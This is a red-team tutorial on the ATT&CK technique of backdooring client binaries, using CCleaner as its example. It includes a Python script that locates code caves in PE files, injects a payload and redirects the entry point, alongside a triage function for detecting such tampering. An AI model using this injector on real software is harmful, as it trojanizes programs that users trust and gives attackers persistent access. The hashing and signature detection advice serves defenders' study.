T1554: Compromise Client Software Binary

Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.

Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this persistent access to the host.

Examples:

This technique is fairly self-explanatory: we take a legitimate binary from the workstation, usually something widely used in the company or industry, and inject our malicious code into it without breaking its normal functionality. There is a great tool for this, although it is a little outdated (as of writing, a new one is being developed for July 2021).

Let us use this tool to create a backdoored binary. In this example I will use the CCleaner application, which is well known for tidying up Windows machines for speed and removing unnecessary or leftover files.

I will focus on the 64-bit version, as this is what the shortcuts currently run:

Let us grab this binary and take it to our Attacking machine.

Here is the command-line example used to backdoor the application:

Once the tool is running, it searches the binary for free space (unused, zero-filled regions, often called code caves) large enough to hold our shellcode. If it finds any, it asks us to choose which of the available locations to inject the code into.

Once it is done, it writes the newly created backdoored binary to a "backdoored" folder.

This new binary keeps its original functionality and now gives us persistence at the user level. We can replace the original with our backdoored one: each time the user launches it we gain a shell, while the application itself behaves exactly as before. Note that the patched file no longer matches the vendor's published hash and, if the original was code-signed, its Authenticode signature no longer verifies, so hash comparison and signature checks on client binaries are the obvious detections for this technique.
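The mechanics the tool automates above (find free space in an executable section, write the payload there, redirect the entry point, and jump back so the application still runs normally), together with the check a defender would run against the result, as an added example that is not the tool's code or part of the original page. It is a stdlib-only Python script operating on a constructed, minimal PE32+ image built inline; the image, the NOP placeholder "payload", and the function names are assumptions for the demo, while the header fields read are the real PE layout (e_lfanew, COFF NumberOfSections and SizeOfOptionalHeader, AddressOfEntryPoint, 40-byte section headers).

```python
import hashlib
import struct

SCN_MEM_EXECUTE = 0x20000000  # IMAGE_SCN_MEM_EXECUTE section flag


def parse_pe(data):
    """Minimal PE reader: returns (AddressOfEntryPoint, optional-header offset, sections)."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file (no MZ header)")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE file (no PE signature)")
    nsect = struct.unpack_from("<H", data, pe_off + 6)[0]      # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]  # COFF SizeOfOptionalHeader
    opt_off = pe_off + 24
    entry = struct.unpack_from("<I", data, opt_off + 16)[0]    # AddressOfEntryPoint
    sections = []
    for i in range(nsect):
        off = opt_off + opt_size + 40 * i                      # section headers are 40 bytes each
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": data[off:off + 8].rstrip(b"\0").decode(), "va": va,
                         "vsize": vsize, "raw": rawptr, "rawsize": rawsize, "chars": chars})
    return entry, opt_off, sections


def find_caves(data, min_size=64):
    """List zero-filled runs of at least min_size bytes inside executable sections."""
    _, _, sections = parse_pe(data)
    caves, run_start = [], None
    for s in sections:
        if not s["chars"] & SCN_MEM_EXECUTE:
            continue
        raw = data[s["raw"]:s["raw"] + s["rawsize"]]
        for i, b in enumerate(raw + b"\x01"):                  # sentinel closes a trailing run
            if b == 0 and run_start is None:
                run_start = i
            elif b != 0 and run_start is not None:
                if i - run_start >= min_size:
                    caves.append({"section": s["name"], "file_off": s["raw"] + run_start,
                                  "rva": s["va"] + run_start, "size": i - run_start})
                run_start = None
    return caves


def inject_into_cave(data, payload, min_size=64):
    """Write payload + 'jmp original_entry' into the largest cave and point the entry point at it."""
    data = bytearray(data)
    entry, opt_off, _ = parse_pe(data)
    caves = [c for c in find_caves(data, min_size) if c["size"] >= len(payload) + 5]
    if not caves:
        raise ValueError("no code cave large enough for the payload")
    cave = max(caves, key=lambda c: c["size"])
    jmp_end = cave["rva"] + len(payload) + 5                   # rel32 is relative to the next instruction
    stub = payload + b"\xE9" + struct.pack("<i", entry - jmp_end)
    data[cave["file_off"]:cave["file_off"] + len(stub)] = stub
    struct.pack_into("<I", data, opt_off + 16, cave["rva"])    # redirect AddressOfEntryPoint
    return bytes(data), cave


def triage(original, suspect):
    """Defender-side check: did the entry point move into what used to be a cave, and what changed?"""
    e0, _, _ = parse_pe(original)
    e1, _, sec1 = parse_pe(suspect)
    entry_section = next((s["name"] for s in sec1
                          if s["va"] <= e1 < s["va"] + max(s["vsize"], s["rawsize"])), None)
    changed = sum(1 for a, b in zip(original, suspect) if a != b)
    return {
        "entry_moved": e0 != e1,
        "entry_section": entry_section,
        "entry_in_former_cave": any(c["rva"] <= e1 < c["rva"] + c["size"] for c in find_caves(original)),
        "changed_bytes": changed,
        "sha256_match": hashlib.sha256(original).digest() == hashlib.sha256(suspect).digest(),
    }


def build_sample_pe():
    """Constructed minimal PE32+ image for the demo (two sections, not a real application)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                      # e_lfanew -> PE signature at 64
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, 240, 0x22)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                      # PE32+ magic
    struct.pack_into("<I", opt, 16, 0x1010)                    # original entry point inside .text

    def sh(name, va, vsize, raw, rawsize, chars):
        return name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", vsize, va, rawsize, raw, 0, 0, 0, 0, chars)

    hdr = (dos + b"PE\0\0" + coff + opt
           + sh(b".text", 0x1000, 0x200, 0x200, 0x200, 0x60000020)    # CODE | EXECUTE | READ
           + sh(b".data", 0x2000, 0x100, 0x400, 0x200, 0xC0000040)).ljust(0x200, b"\0")
    text = (b"\xCC" * 0x40).ljust(0x200, b"\0")                # 64 bytes of "code", then a 448-byte cave
    data = (b"A" * 0x100).ljust(0x200, b"\0")
    return bytes(hdr + text + data)


if __name__ == "__main__":
    original = build_sample_pe()
    print("caves:", find_caves(original))
    backdoored, used = inject_into_cave(original, b"\x90" * 16)   # placeholder payload, not shellcode
    print("injected at RVA 0x%x" % used["rva"])
    print("triage:", triage(original, backdoored))
```

The jump back to the original entry point is what keeps the user-visible behaviour unchanged; the triage output shows why that is still detectable without a signature check: the entry point now sits in a region that was padding in the pristine copy, and the files hash differently.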
